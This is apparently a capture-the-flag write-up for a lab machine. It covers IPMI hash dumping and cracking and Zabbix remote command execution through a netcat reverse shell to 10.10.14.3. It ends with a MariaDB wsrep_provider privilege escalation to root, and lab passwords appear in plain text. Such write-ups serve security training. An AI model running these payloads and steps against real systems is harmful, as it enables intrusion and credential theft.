Enum

nmap

tcp

# Nmap 7.92 scan initiated Sun Nov 14 21:46:39 2021 as: nmap -sU -oN nmap_udp 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT    STATE SERVICE
623/udp open  asf-rmcp

# Nmap done at Sun Nov 14 22:03:47 2021 -- 1 IP address (1 host up) scanned in 1028.62 seconds

udp

# Nmap 7.92 scan initiated Sun Nov 14 21:46:39 2021 as: nmap -sU -oN nmap_udp 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT    STATE SERVICE
623/udp open  asf-rmcp

# Nmap done at Sun Nov 14 22:03:47 2021 -- 1 IP address (1 host up) scanned in 1028.62 seconds

ffuf enumerating vhosts

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

ipmi

auxiliary(scanner/ipmi/ipmi_dumphashes) > options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   CRACK_COMMON          true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                      no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                         no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS                                                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 623                                                                yes       The target port
   SESSION_MAX_ATTEMPTS  5                                                                  yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                                                  yes       Delay between session retries in seconds
   THREADS               1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124
rhosts => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:6cc0ad35020200002519f512e508955ff0450bf041025e8e9d8b35e0707445571f3708d332315356a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:a9b4ed4f145e48181e5e441d50b25b7ad6c4647b

We can crack this by using john

john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                           
Using default input encoding: UTF-8
Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 256/256 AVX2 8x])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovepumkinpie1  (10.10.11.124 Administrator)
1g 0:00:00:00 DONE (2021-11-14 22:17) 1.298g/s 10213Kp/s 10213Kc/s 10213KC/s in_199..giugno81
Use the "--show" option to display all of the cracked passwords reliably
Session completed

If we google how to execute commands on Zabbix, we reach this post.

And we enter the key:

system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f &,nowait]

And we get our reverse shell

$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.124] 41472
/bin/sh: 0: can't access tty; job control turned off
whoami
zabbix
$ 

We can reuse the password and pivot the user ipmi-svc which gives us user.txt.

If we run linpeas, we notice

════════════════════════════════════╣ Software Information ╠════════════════════════════════════                                                                                                                                             
╔══════════╣ MySQL version                                                                                                                                                                                                                   
mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

If we enumerate some db creds we find

cat /etc/zabbix/zabbix_server.conf | grep -v \#
[...]
DBName=zabbix                                                                     
DBUser=zabbix
DBPassword=bloooarskybluh

If we google for exploits targeting that version, we find this

And we just follow the steps and finally execute

mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/dev/shm/tmp.so";'
$ rlwrap nc -nvlp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.124] 51864
python3 -c "import pty;pty.spawn('/bin/bash')"
whoami
whoami
root
root@shibboleth:/var/lib/mysql#